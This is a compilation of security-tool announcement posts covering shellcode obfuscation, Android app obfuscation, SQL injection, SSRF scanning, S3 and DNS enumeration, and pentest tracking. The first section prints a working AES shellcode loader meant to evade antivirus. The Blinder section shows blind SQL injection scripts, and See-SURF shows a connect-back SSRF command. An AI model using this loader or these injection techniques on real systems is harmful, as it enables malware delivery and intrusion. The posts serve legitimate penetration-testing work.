
PythonAESObfuscate - Obfuscates A Python Script And The Accompanying Shellcode


Pythonic way to load shellcode. Builds an EXE for you too!

Usage
  • Place a payload.bin raw shellcode file in the same directory. The default architecture is x86.
  • Run python obfuscate.py.
  • The default output is out.py.

Requirements
  • Windows
  • Python 2.7
  • Pyinstaller
  • PyCrypto (PyCryptodome didn't seem to work)
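For context, loaders of this kind typically decrypt the shellcode with AES at runtime and execute it from memory via ctypes. The following is a minimal, hypothetical sketch of that pattern; the key, IV, filename and flag values are illustrative assumptions, not taken from this tool:

import ctypes
from Crypto.Cipher import AES

KEY = b"0123456789abcdef"  # hypothetical 16-byte AES key embedded by the obfuscator
IV = b"fedcba9876543210"   # hypothetical 16-byte IV

def decrypt(blob):
    # AES-CBC decrypt, then strip PKCS#7-style padding
    plain = AES.new(KEY, AES.MODE_CBC, IV).decrypt(blob)
    return plain[:-ord(plain[-1:])]

def execute(shellcode):
    # Classic ctypes pattern on 32-bit Windows: RWX allocation, copy, run in a new thread
    ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x3000, 0x40)
    buf = ctypes.create_string_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(ptr), buf, len(shellcode))
    handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_void_p(ptr), 0, 0, 0)
    ctypes.windll.kernel32.WaitForSingleObject(handle, 0xFFFFFFFF)

execute(decrypt(open("payload.enc", "rb").read()))  # "payload.enc" is a placeholder name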


Kali Linux 2020.1 Release - Penetration Testing and Ethical Hacking Linux Distribution


We are incredibly excited to announce the first release of 2020, Kali Linux 2020.1.

2020.1 includes some exciting new updates:

Non-Root

Throughout the history of Kali (and its predecessors BackTrack, WHAX, and Whoppix), the default credentials have been root/toor. This is no more. We are no longer using the superuser account, root, as the default in Kali 2020.1. The default user account is now a standard, unprivileged user.

root/toor is dead. Long live kali/kali.

NetHunter Images

The mobile pen-testing platform, Kali NetHunter, has also received some improvements. You are no longer required to root your phone in order to run Kali NetHunter, but that does come with some limitations.
To suit everybody’s needs, Kali NetHunter now comes in the following three editions:
  • NetHunter – Needs rooted devices with custom recovery and a patched kernel. Has no restrictions. Device-specific images are available here.
  • NetHunter Light – Needs rooted devices with custom recovery but no custom kernel. Has minor restrictions, i.e. no WiFi injection or HID support. Architecture-specific images are available here.
  • NetHunter Rootless – Installable on all stock, unmodified devices using Termux. Some limitations, like lack of db support in Metasploit and no root permissions. Installation instructions are available here.

The NetHunter documentation page includes a more detailed comparison.


Upgrade to Kali Linux 2020.1

Existing Upgrades

If you already have an existing Kali installation, remember you can always do a quick update:
kali@kali:~$ cat <<EOF | sudo tee /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
EOF
kali@kali:~$
kali@kali:~$ sudo apt update && sudo apt -y full-upgrade
kali@kali:~$
kali@kali:~$ [ -f /var/run/reboot-required ] && sudo reboot -f
kali@kali:~$

You should now be on Kali Linux 2020.1. We can do a quick check by doing:
kali@kali:~$ grep VERSION /etc/os-release
VERSION="2020.1"
VERSION_ID="2020.1"
VERSION_CODENAME="kali-rolling"
kali@kali:~$
kali@kali:~$ uname -v
#1 SMP Debian 5.4.13-1kali1 (2020-01-20)
kali@kali:~$
kali@kali:~$ uname -r
5.4.0-kali3-amd64
kali@kali:~$

NOTE: The output of uname -r may be different depending on architecture.


More info here.


Obfuscapk - A Black-Box Obfuscation Tool For Android Apps


Obfuscapk is a modular Python tool for obfuscating Android apps without needing their source code: apktool is used to decompile the original apk file and to build a new application after applying some obfuscation techniques to the decompiled smali code, resources and manifest. The obfuscated app retains the same functionality as the original one, but the differences under the hood sometimes make the new application appear very different from the original (e.g., to signature-based antivirus software).

Demo


Architecture


Obfuscapk is designed to be modular and easy to extend, so it's built using a plugin system. Consequently, every obfuscator is a plugin that inherits from an abstract base class and needs to implement the method obfuscate. When the tool starts processing a new Android application file, it creates an obfuscation object to store all the needed information (e.g., the location of the decompiled smali code) and the internal state of the operations (e.g., the list of already used obfuscators). The obfuscation object is then passed as a parameter to the obfuscate method of each active plugin/obfuscator (in sequence) to be processed and modified. The list and order of the active plugins are specified through command line options.
The tool is easily extensible with new obfuscators: it's enough to add the source code implementing the obfuscation technique and the plugin metadata (an <obfuscator-name>.obfuscator file) in the src/obfuscapk/obfuscators directory (take a simple existing obfuscator like Nop as a starting example). The tool will automatically detect the new plugin, so no further configuration is needed (the new plugin will be treated like all the other plugins bundled with the tool); a minimal sketch is shown below.
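To give an idea of the shape of a plugin, here is a minimal sketch; the class and method names follow the pattern of the bundled obfuscators, but treat the exact API as an assumption and check the Nop source for the real signatures:

import logging

from obfuscapk import obfuscator_category
from obfuscapk.obfuscation import Obfuscation

class MyNop(obfuscator_category.ICodeObfuscator):

    def __init__(self):
        self.logger = logging.getLogger(__name__)
        super().__init__()

    def obfuscate(self, obfuscation_info: Obfuscation):
        # Receives the shared obfuscation object and would transform the
        # decompiled smali files in place (this placeholder does nothing).
        self.logger.info("Running MyNop obfuscator")

A MyNop.obfuscator metadata file would accompany the source file in the same directory.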

Installation
There are two ways of getting a working copy of Obfuscapk on your own computer: either by using Docker or by directly using the source code in a Python 3.7 environment. In both cases, the first thing to do is to get a local copy of this repository, so open up a terminal in the directory where you want to save the project and clone the repository:
$ git clone https://github.com/ClaudiuGeorgiu/Obfuscapk.git

Docker image

Prerequisites
This is the suggested way of installing Obfuscapk, since the only requirement is to have a recent version of Docker installed:
$ docker --version             
Docker version 19.03.0, build aeac949

Official Docker Hub image
The official Obfuscapk Docker image is available on Docker Hub (automatically built from this repository):
$ # Download the Docker image.
$ docker pull claudiugeorgiu/obfuscapk
$ # Give it a shorter name.
$ docker tag claudiugeorgiu/obfuscapk obfuscapk

Install
If you downloaded the official image from Docker Hub, you are ready to use the tool, so go ahead and check the usage instructions. Otherwise, execute the following commands in the previously created Obfuscapk/src/ directory (the folder containing the Dockerfile) in order to build the Docker image:
$ # Make sure to run the command in Obfuscapk/src/ directory.
$ # It will take some time to download and install all the dependencies.
$ docker build -t obfuscapk .
When the Docker image is ready, make a quick test to check that everything was installed correctly:
$ docker run --rm -it obfuscapk --help
usage: python3.7 -m obfuscapk.cli [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK]
...
Obfuscapk is now ready to be used; see the usage instructions for more information.

From source

Prerequisites
Make sure to have apktool, jarsigner and zipalign installed and available from command line:
$ apktool          
Apktool v2.4.0 - a tool for reengineering Android apk files
...
$ jarsigner
Usage: jarsigner [options] jar-file alias
jarsigner -verify [options] jar-file [alias...]
...
$ zipalign
Zip alignment utility
Copyright (C) 2009 The Android Open Source Project
...
To install and use apktool you need a recent version of Java, which should also have jarsigner bundled. zipalign is included in the Android SDK. The location of the executables can also be specified through the following environment variables: APKTOOL_PATH, JARSIGNER_PATH and ZIPALIGN_PATH (e.g., in Ubuntu, run export APKTOOL_PATH=/custom/location/apktool before running Obfuscapk in the same terminal).
Apart from the above tools, the only requirement of this project is a working Python 3.7 installation (along with its package manager pip).

Install
Run the following commands in the main directory of the project (Obfuscapk/) to install the needed dependencies:
$ # Make sure to run the commands in Obfuscapk/ directory.

$ # The usage of a virtual environment is highly recommended, e.g., virtualenv.
$ # If not using virtualenv (https://virtualenv.pypa.io/), skip the next 2 lines.
$ virtualenv -p python3.7 venv
$ source venv/bin/activate

$ # Install Obfuscapk's requirements.
$ python3.7 -m pip install -r src/requirements.txt
After the requirements are installed, make a quick test to check that everything works correctly:
$ cd src/
$ # The following command has to be executed always from Obfuscapk/src/ directory
$ # or by adding Obfuscapk/src/ directory to PYTHONPATH environment variable.
$ python3.7 -m obfuscapk.cli --help
usage: python3.7 -m obfuscapk.cli [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK]
...
Obfuscapk is now ready to be used; see the usage instructions for more information.

Usage
From now on, Obfuscapk will be treated as an executable available as obfuscapk; adapt the commands according to how you installed the tool:
  • Docker image: a local directory containing the application to obfuscate has to be mounted to /workdir in the container (e.g., the current directory "${PWD}"), so the command:
    $ obfuscapk [params...]
    becomes:
    $ docker run --rm -it -u $(id -u):$(id -g) -v "${PWD}":"/workdir" obfuscapk [params...]
  • From source: every instruction has to be executed from the Obfuscapk/src/ directory (or by adding Obfuscapk/src/ directory to PYTHONPATH environment variable) and the command:
    $ obfuscapk [params...]
    becomes:
    $ python3.7 -m obfuscapk.cli [params...]
Let's start by looking at the help message:
$ obfuscapk --help
obfuscapk [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK] [-i] [-p] [-k VT_API_KEY] <APK_FILE>
There are two mandatory parameters: <APK_FILE>, the path (relative or absolute) to the apk file to obfuscate, and the list of the obfuscation techniques to apply (specified with the -o option, e.g., -o Rebuild -o NewSignature -o NewAlignment). The other optional arguments are as follows:
  • -w DIR is used to set the working directory where to save the intermediate files (generated by apktool). If not specified, a directory named obfuscation_working_dir is created in the same directory as the input application. This can be useful for debugging purposes, but if it's not needed it can be set to a temporary directory (e.g., -w /tmp/).
  • -d OUT_APK is used to set the path of the destination file: the apk file generated by the obfuscation process (e.g., -d /home/user/Desktop/obfuscated.apk). If not specified, the final obfuscated file will be saved inside the working directory. Note: existing files will be overwritten without any warning.
  • -i is a flag for ignoring known third-party libraries during the obfuscation, in order to use fewer resources, increase performance and reduce the risk of errors. The list of libraries to ignore is adapted from the LiteRadar project.
  • -p is a flag for showing progress bars during the obfuscation operations. When using the tool in batch operations/automated builds it's convenient to leave progress bars disabled; otherwise, enable this flag to see the obfuscation progress.
  • -k VT_API_KEY is needed only when using VirusTotal obfuscator, to set the API key(s) to be used when communicating with Virus Total. Can be set multiple times to cycle through the API keys during the requests (e.g., -k VALID_VT_KEY_1 -k VALID_VT_KEY_2).
Let's consider now a simple working example to see how Obfuscapk works:
$ # original.apk is a valid Android apk file.
$ obfuscapk -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment original.apk
When running the above command, this is what happens behind the scenes:
  • since no working directory was specified, a new working directory (obfuscation_working_dir) is created in the same location as original.apk (this can be useful to inspect the smali files/manifest/resources in case of errors)
  • some checks are performed in order to make sure that all the needed files/executables are available
  • the actual obfuscation process begins: the specified obfuscators are executed (in order) one by one until there's no obfuscator left or until an error is encountered
    • when running the first obfuscator, original.apk is decompiled with apktool and the results are stored into the working directory
    • since the first obfuscator is RandomManifest, the entries in the decompiled Android manifest are reordered randomly (without breaking the xml structures)
    • Rebuild obfuscator simply rebuilds the application (now with the modified manifest) using apktool, and since no output file was specified, the resulting apk file is saved in the working directory created before
    • NewSignature obfuscator signs the newly created apk file with a custom certificate contained in this keystore
    • NewAlignment obfuscator uses zipalign tool to align the resulting apk file
  • when all the obfuscators have been executed without errors, the resulting obfuscated apk file can be found in obfuscation_working_dir/original_obfuscated.apk, signed, aligned and ready to be installed into a device/emulator
As seen in the previous example, Rebuild, NewSignature and NewAlignment obfuscators are always needed to complete an obfuscation operation, in order to build the final obfuscated apk. They are not actual obfuscation techniques, but they are needed in the build process and so they are included in the list of obfuscators to keep the overall architecture modular.

Obfuscators
The obfuscators included in Obfuscapk can be divided into different categories, depending on the operations they perform:
  • Trivial: as the name suggests, this category includes simple operations (that do not significantly modify the original application), like signing the apk file with a new signature.
  • Rename: operations that change the names of the used identifiers (classes, fields, methods).
  • Encryption: packaging encrypted code/resources and decrypting them during app execution. When Obfuscapk starts, it automatically generates a random secret key (32 characters long, using ASCII letters and digits) that will be used for encryption (see the sketch after this list).
  • Code: all the operations that involve the modification of the decompiled source code.
  • Resources: operations on the resource files (like modifying the manifest).
  • Other
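For illustration, generating such a key could look like the following sketch of the described behavior (not Obfuscapk's actual code):

import random
import string

# 32-character random key drawn from ASCII letters and digits, as described above
secret_key = "".join(random.choice(string.ascii_letters + string.digits) for _ in range(32))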
The obfuscators currently bundled with Obfuscapk are briefly presented below (in alphabetical order). Please refer to the code for more details.
NOTE: not all the obfuscators below correspond to real obfuscation techniques (e.g., Rebuild, NewSignature, NewAlignment and VirusTotal), but they are implemented as obfuscators in order to keep the architecture modular and easy to extend with new functionality.

AdvancedReflection [Code]
Uses reflection to invoke dangerous APIs of the Android Framework. In order to find out if a method belongs to the Android Framework, Obfuscapk refers to the mapping discovered by Backes et al.

ArithmeticBranch [Code]
Insert junk code. In this case, the junk code is composed of arithmetic computations and a branch instruction depending on the result of these computations, crafted in such a way that the branch is never taken.

AssetEncryption [Encryption]
Encrypt asset files.

CallIndirection [Code]
This technique modifies the control-flow graph without impacting the code semantics: it adds new methods that invoke the original ones. For example, an invocation of the method m1 will be substituted by a new wrapper method m2 that, when invoked, calls the original method m1.
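The transformation happens on smali code, but the idea can be shown with a toy Python analogue:

def m1(x):
    return x * 2  # original method

def m2(x):
    # wrapper added by the obfuscator; call sites are rewritten to target m2
    return m1(x)

assert m2(21) == 42  # semantics are unchanged, only the call graph differs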

ClassRename [Rename]
Change the package name and rename classes (even in the manifest file).

ConstStringEncryption [Encryption]
Encrypt constant strings in code.

DebugRemoval [Code]
Remove debug information.

FieldRename [Rename]
Rename fields.

Goto [Code]
Given a method, it inserts a goto instruction pointing to the end of the method and another goto pointing to the instruction after the first goto; it modifies the control-flow graph by adding two new nodes.

LibEncryption [Encryption]
Encrypt native libs.

MethodOverload [Code]
It exploits the overloading feature of the Java programming language to assign the same name to different methods but using different arguments. Given an already existing method, this technique creates a new void method with the same name and arguments, but it also adds new random arguments. Then, the body of the new method is filled with random arithmetic instructions.

MethodRename [Rename]
Rename methods.

NewAlignment [Trivial]
Realign the application.

NewSignature [Trivial]
Re-sign the application with a new custom signature.

Nop [Code]
Insert junk code. Nop, short for no-operation, is a dedicated instruction that does nothing. This technique just inserts random nop instructions within every method implementation.

RandomManifest [Resource]
Randomly reorder entries in the manifest file.

Rebuild [Trivial]
Rebuild the application.

Reflection [Code]
This technique analyzes the existing code looking for method invocations of the app, ignoring the calls to the Android framework (see AdvancedReflection). If it finds an instruction with a suitable method invocation (i.e., no constructor methods, public visibility, enough free registers, etc.) such invocation is redirected to a custom method that will invoke the original method using the Reflection APIs.

Reorder [Code]
This technique consists of changing the order of basic blocks in the code. When a branch instruction is found, the condition is inverted (e.g., "branch if lower than" becomes "branch if greater than or equal to") and the target basic blocks are reordered accordingly. Furthermore, it also randomly re-arranges the code abusing goto instructions.

ResStringEncryption [Encryption]
Encrypt strings in resources (only those called inside code).

VirusTotal [Other]
Send the original and the obfuscated application to Virus Total. You must provide the VT API key (see -k option).

Credits

This software was developed for research purposes at the Computer Security Lab (CSecLab), hosted at DIBRIS, University of Genoa.

Team


Blinder - A Python Library To Automate Time-Based Blind SQL Injection


Blinder is a small Python library to automate time-based blind SQL injection by using predefined queries as functions, enabling rapid PoC development.

Installation
You can install Blinder using the following command:
pip install blinder
Or by downloading the source and importing it manually to your project.

Usage
To use Blinder you need to import the Blinder module, then start using its main functions.
You can use Blinder (in the current version) to do the following:
  • Check for time based injection.
  • Get database name.
  • Get tables names.
You can check for injection in a URL using the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)

print blind.check_injection()
The execution result will be:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
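Conceptually, a check like this compares response times with and without a sleep payload. A rough sketch of the idea follows (illustrative only, not Blinder's internals; it assumes the requests library and a MySQL-style SLEEP()):

import time
import requests

def looks_time_injectable(url, sleep=2):
    # Measure a baseline request, then a request with a sleep payload appended
    start = time.time()
    requests.get(url)
    baseline = time.time() - start
    start = time.time()
    requests.get(url + "' AND SLEEP(%d)-- -" % sleep)  # hypothetical payload
    return (time.time() - start) > baseline + sleep * 0.8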
You can get the database name using the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)

print "Database name is : %s " % blind.get_database()
And the results will be:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
To get table names you can use the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
)

tables = blind.get_tables()

for table in tables:
    print table
And the results will be:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO
A lot of features will be added soon, like:
  • the ability to add customized queries
  • testing injection points based on a Burp request
  • extracting table/column data


See-SURF - Python Based Scanner To Find Potential SSRF Parameters


A Python based scanner to find potential SSRF parameters in a web application.

Motivation
SSRF being one of the critical vulnerabilities out there on the web, I saw there was no tool that would automate finding potentially vulnerable parameters. See-SURF can be added to your arsenal for recon while doing bug hunting/web security testing.

Tech/framework used
Built with
  • Python3

Features
  1. Takes Burp's sitemap as input and parses the file with a strong regex, matching any GET/POST URL parameters containing potentially vulnerable SSRF keywords like URL/website etc. Also checks the parameter values for any URL or IP address passed (see the sketch after this list). Example GET requests -
    google.com/url=https://yahoo.com
    google.com/q=https://yahoo.com
    FORMS -
    <input type="text" name="url" value="https://google.com" placeholder="https://msn.com">
  2. Multi-threaded built-in crawler to gather as much data as possible, then parse it to identify potentially vulnerable SSRF parameters.
  3. Supply cookies for authenticated scanning.
  4. By default, normal mode is on; with the verbose switch you will see the same vulnerable param in different endpoints. The same parameter may not be sanitized in all places, but verbose mode generates a lot of noise. Example:
    https://google.com/path/1/urlToConnect=https://yahoo.com
    https://google.com/differentpath/urlToConnect=https://yahoo.com
  5. Exploitation - Makes an external request to burp collaborator or any other http server with the vulnerable parameter to confirm the possibility of SSRF.
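A simplified sketch of the parameter check described in feature 1 (the keyword list and regexes here are hypothetical, not See-SURF's actual ones):

import re
from urllib.parse import urlparse, parse_qs

SSRF_KEYWORDS = re.compile(r"(url|uri|site|website|host|redirect|dest|path)", re.I)
URL_OR_IP = re.compile(r"^(https?://|(\d{1,3}\.){3}\d{1,3})")

def potential_ssrf_params(url):
    # Flag parameters whose name looks SSRF-prone or whose value is a URL/IP
    params = parse_qs(urlparse(url).query)
    return [name for name, values in params.items()
            if SSRF_KEYWORDS.search(name) or any(URL_OR_IP.match(v) for v in values)]

print(potential_ssrf_params("https://google.com/?q=1&url=https://yahoo.com"))  # ['url']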

How to use?
[-] This would run with default threads=10, no cookies/session and NO verbose mode
python3 see-surf.py -H https://www.google.com
[-] Space-separated cookies can be supplied for authenticated session crawling
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2
[-] Supplying the number of threads and verbose mode (verbose mode takes longer, but the possibility of finding bugs increases)
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -t 20 -v
By default, normal mode is on; with the verbose switch you would see the same potentially vulnerable param in different endpoints. (The same parameter may not be sanitized in all places, but verbose mode generates a lot of noise.)
Example:
https://google.com/abc/1/urlToConnect=https://yahoo.com
https://google.com/123/urlToConnect=https://yahoo.com

Version-2 (Best Recommended)
Burp Sitemap (-b switch) & Connect back automation ( -p switch )

Complete Command would look like this -
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -b burp_file.xml -p http://72.72.72.72:8000
[-] -b switch: provide Burp sitemap files for better discovery of potential SSRF parameters. The script will first parse the Burp file to identify potential params and then run the built-in crawler on them.

Browse the target with Burp Suite running in the background and make some GET/POST requests - the more the better. Then go to the target, right click -> "Save selected items" and save the file. Provide it to the script as follows.
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -b burp_file.xml


[-] -p switch: fire up Burp Collaborator and pass the host with the -p parameter, or start a simple Python HTTP server and wait for the vulnerable param to execute your request. (Highly recommended.)
(This mainly helps in exploiting GET requests; for POST you would need to exploit it manually.)
The payload gets executed with the param appended at the end of the string, so it's easy to identify which one is vulnerable. For example: http://72.72.72.72:8000/vulnerableparam
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -p http://72.72.72.72:8000


Installation
git clone https://github.com/In3tinct/See-SURF.git
cd See-SURF/
pip3 install BeautifulSoup4
pip3 install requests

Tests
A basic framework has been created. More tests will be added to reduce false positives.

Credits
Template - https://gist.github.com/akashnimare/7b065c12d9750578de8e705fb4771d2f
Some regexes from https://www.regextester.com/

Future Extensions
  • Include more places to look for potential params like Javascript files
  • Finding potential params during redirection.
  • More conditions to avoid false positives.
  • Exploitation.


S3Enum - Fast Amazon S3 Bucket Enumeration Tool For Pentesters


s3enum is a tool to enumerate a target's Amazon S3 buckets. It is fast and leverages DNS instead of HTTP, which means that requests don't hit AWS directly.
It was originally built back in 2016 to target GitHub.

Installation

Binaries
Find the binaries on the Releases page.

Go
go get github.com/koenrh/s3enum

Usage
You need to specify the base name of the target (e.g. hackerone), and a word list. You could either use the example wordlist.txt file from this repository, or get a word list elsewhere. Optionally, you could specify the number of threads (defaults to 10).
$ s3enum --wordlist examples/wordlist.txt --suffixlist examples/suffixlist.txt --threads 10 hackerone

hackerone
hackerone-attachment
hackerone-attachments
hackerone-static
hackerone-upload
By default, s3enum will use the name server specified in /etc/resolv.conf. Alternatively, you can specify a different name server using the --nameserver option. You can also test multiple names at the same time.
s3enum \
--wordlist examples/wordlist.txt \
--suffixlist examples/suffixlist.txt \
--nameserver 1.1.1.1 \
hackerone h1 roflcopter
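The underlying DNS trick can be illustrated in a few lines of Python (a conceptual sketch, not s3enum's Go implementation): a candidate bucket exists if <name>.s3.amazonaws.com resolves, while an NXDOMAIN answer means it does not.

import socket

def bucket_exists(name):
    # Resolution succeeding implies the bucket name exists; NXDOMAIN raises gaierror
    try:
        socket.gethostbyname("%s.s3.amazonaws.com" % name)
        return True
    except socket.gaierror:
        return False

for candidate in ("hackerone", "hackerone-attachments"):
    print(candidate, bucket_exists(candidate))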


MassDNS - A High-Performance DNS Stub Resolver For Bulk Lookups And Reconnaissance (Subdomain Enumeration)


MassDNS is a simple high-performance DNS stub resolver targeting those who seek to resolve a massive amount of domain names in the order of millions or even billions. Without special configuration, MassDNS is capable of resolving over 350,000 names per second using publicly available resolvers.

Major changes
This version of MassDNS is currently experimental. In order to speed up the resolving process, the ldns dependency has been replaced by a custom stack-based DNS implementation (which currently only supports the text representation of the most common DNS records). Furthermore, epoll has been introduced in order to lighten CPU usage when operating with low concurrency, which may have broken compatibility with some platforms. In case of bugs, please create an issue and switch to the more mature version 0.2.
Also note that the command line interface has changed slightly due to criticism of the output complexity. Additionally, the default values of the -s and -i parameters have been changed. The repository structure has been changed as well.

Contributors

Compilation
Clone the git repository and cd into the project root folder. Then run make to build from source. If you are not on Linux, run make nolinux. On Windows, the Cygwin packages gcc-core, git and make are required.

Usage
Usage: ./bin/massdns [options] [domainlist]
-b --bindto Bind to IP address and port. (Default: 0.0.0.0:0)
--busy-poll Use busy-wait polling instead of epoll.
-c --resolve-count Number of resolves for a name before giving up. (Default: 50)
--drop-group Group to drop privileges to when running as root. (Default: nogroup)
--drop-user User to drop privileges to when running as root. (Default: nobody)
--flush Flush the output file whenever a response was received.
-h --help Show this help.
-i --interval Interval in milliseconds to wait between multiple resolves of the same
domain. (Default: 500)
-l --error-log Error log file path. (Default: /dev/stderr)
--norecurse Use non-recursive queries. Useful for DNS cache snooping.
-o --output Flags for output formatting.
--predictable Use resolvers incrementally. Useful for resolver tests.
--processes Number of processes to be used for resolving. (Default: 1)
-q --quiet Quiet mode.
--rcvbuf Size of the receive buffer in bytes.
--retry Unacceptable DNS response codes. (Default: REFUSED)
-r --resolvers Text file containing DNS resolvers.
--root Do not drop privileges when running as root. Not recommended.
-s --hashmap-size Number of concurrent lookups. (Default: 10000)
--sndbuf Size of the send buffer in bytes.
--sticky Do not switch the resolver when retrying.
--socket-count Socket count per process. (Default: 1)
-t --type Record type to be resolved. (Default: A)
--verify-ip Verify IP addresses of incoming replies.
-w --outfile Write to the specified output file instead of standard output.

Output flags:
S - simple text output
F - full text output
B - binary output
J - ndjson output
This overview may be incomplete. For more options, especially concerning output formatting, use --help.

Example
Resolve all AAAA records for the domains within domains.txt using the resolvers in lists/resolvers.txt and store the results within results.txt:
$ ./bin/massdns -r lists/resolvers.txt -t AAAA domains.txt > results.txt
This is equivalent to:
$ ./bin/massdns -r lists/resolvers.txt -t AAAA -w results.txt domains.txt

Example output
By default, MassDNS will output response packets in text format which looks similar to the following:
;; Server: 77.41.229.2:53
;; Size: 93
;; Unix time: 1513458347
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51298
;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
example.com. IN A

;; ANSWER SECTION:
example.com. 45929 IN A 93.184.216.34

;; AUTHORITY SECTION:
example.com. 24852 IN NS b.iana-servers.net.
example.com. 24852 IN NS a.iana-servers.net.
The resolver IP address is included in order to make it easier for you to filter the output in case you detect that some resolvers produce bad results.

Resolving
The repository includes the file resolvers.txt consisting of a filtered subset of the resolvers provided by the subbrute project. Please note that the usage of MassDNS may cause a significant load on the used resolvers and result in abuse complaints being sent to your ISP. Also note that the provided resolvers are not guaranteed to be trustworthy. The resolver list is currently outdated with a large share of resolvers being dysfunctional.
MassDNS's DNS implementation is currently very rudimentary and only supports the most common records. You are welcome to help change this by collaborating.

PTR records
MassDNS includes a Python script allowing you to resolve all IPv4 PTR records by printing their respective queries to the standard output.
$ ./scripts/ptr.py | ./bin/massdns -r lists/resolvers.txt -t PTR -w ptr.txt
Please note that the labels within in-addr.arpa are reversed. In order to resolve the domain name of 1.2.3.4, MassDNS expects 4.3.2.1.in-addr.arpa as input query name. As a consequence, the Python script does not resolve the records in an ascending order which is an advantage because sudden heavy spikes at the name servers of IPv4 subnets are avoided.
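The reversal itself is a one-liner, for example:

def ptr_name(ip):
    # 1.2.3.4 -> 4.3.2.1.in-addr.arpa
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"

print(ptr_name("1.2.3.4"))  # 4.3.2.1.in-addr.arpa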

Reconnaissance by brute-forcing subdomains
Perform reconnaissance scans responsibly and adjust the -s parameter to not overwhelm authoritative name servers.
Similar to subbrute, MassDNS allows you to brute force subdomains using the included subbrute.py script:
$ ./scripts/subbrute.py lists/names.txt example.com | ./bin/massdns -r lists/resolvers.txt -t A -o S -w results.txt
As an additional method of reconnaissance, the ct.py script extracts subdomains from certificate transparency logs by scraping the data from crt.sh:
$ ./scripts/ct.py example.com | ./bin/massdns -r lists/resolvers.txt -t A -o S -w results.txt
The files names.txt and names_small.txt, which have been copied from the subbrute project, contain names of commonly used subdomains. Also consider using Jason Haddix' subdomain compilation with over 1,000,000 names.

Security
MassDNS does not require root privileges and will therefore drop privileges to the user called "nobody" by default when being run as root. If the user "nobody" does not exist, MassDNS will refuse execution. In this case, it is recommended to run MassDNS as another non-privileged user. The privilege drop can be circumvented using the --root argument which is not recommended. Also note that other branches than master should not be used in production at all.

Practical considerations

Performance tuning
MassDNS is a simple single-threaded application designed for scenarios in which the network is the bottleneck. It is designed to be run on servers with high upload and download bandwidths. Internally, MassDNS makes use of a hash map which controls the concurrency of lookups. Setting the size parameter -s hence allows you to control the lookup rate. If you are experiencing performance issues, try adjusting the -s parameter in order to obtain a better success rate.

Rate limiting evasion
In case rate limiting by IPv6 resolvers is a problem, have a look at the freebind project including packetrand, which will cause each packet to be sent from a different IPv6 address from a routed prefix.

Result authenticity
If the authenticity of results is highly essential, you should not rely on the included resolver list. Instead, set up a local unbound resolver and supply MassDNS with its IP address. In case you are using MassDNS as a reconnaissance tool, you may wish to run it with the default resolver list first and re-run it on the found names with a list of trusted resolvers in order to eliminate false positives.

Todo
  • Prevent flooding resolvers which are employing rate limits or refusing resolves after some time
  • Implement bandwidth limits
  • Employ cross-resolver checks to detect DNS poisoning and DNS spam (e.g. Level 3 DNS hijacking)
  • Add wildcard detection for reconnaissance
  • Improve reconnaissance reliability by adding a mode which re-resolves found domains through a list of trusted (local) resolvers in order to eliminate false positives
  • Detect optimal concurrency automatically
  • Parse the command line properly and allow the usage/combination of short options without spaces


RiskAssessmentFramework - Static Application Security Testing


The OWASP Risk Assessment Framework consists of static application security testing and risk assessment tools. Even though there are many SAST tools available for testers, the compatibility and environment setup process is complex. By using the OWASP Risk Assessment Framework's Static Application Security Testing tool, testers will be able to analyse and review their code quality and vulnerabilities without any additional setup. The OWASP Risk Assessment Framework can be integrated into the DevSecOps toolchain to help developers write and produce secure code.

Features
  • Remote Web Deface Detection (Optional)
  • Static Application security Testing

Web Deface Detection

Web Deface Detection Installation
  • cd web_deface/
  • pip install -r requirements.txt
  • python web_deface.py <notif arguments>
  • For more detailed information, refer to the user guide
    An update related to web deface detection has been released; please see the video on YouTube

Static Application Security Testing (Under Development)
  • For more detailed information, refer to the user guide

Demo RAF SAST Tool



Contribute
Want to contribute to this project? DM me via Twitter: @johnleedik

Project Lead



Project-Black - Pentest/BugBounty Progress Control With Scanning Modules


Scope control, scope scanner and progress tracker for easier working on a bug bounty or pentest project.

What is this tool for?
The tool encourages more methodical work on pentest/bugbounty projects, tracking the progress and general scan information.
It can launch
  • masscan
  • nmap
  • dirsearch
  • amass
  • patator
against the scope you work on and store the data in a handy form. Perform useful filtering of the project's data, for instance:
  • find all hosts which have open ports, but not port 80
  • find all hosts whose IPs start with 82.
  • find hosts where dirsearch has found at least 1 file with a 200 status code

Installation
The basic setup via docker-compose will run on any system that has the docker and docker-compose dependencies.
If you don't have docker installed:

Docker for Ubuntu/Debian
sudo apt install docker.io

Tool installation
If you have docker set up, then for Ubuntu/Debian simply
sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
git clone https://github.com/c0rvax/project-black
cd project-black
sudo docker-compose up
If you see some SQL errors, try stopping docker-compose (Ctrl + C once and wait for a clean shutdown) and running docker-compose up again.
This might take some time, but that's it! Other distros should have very similar guidance.
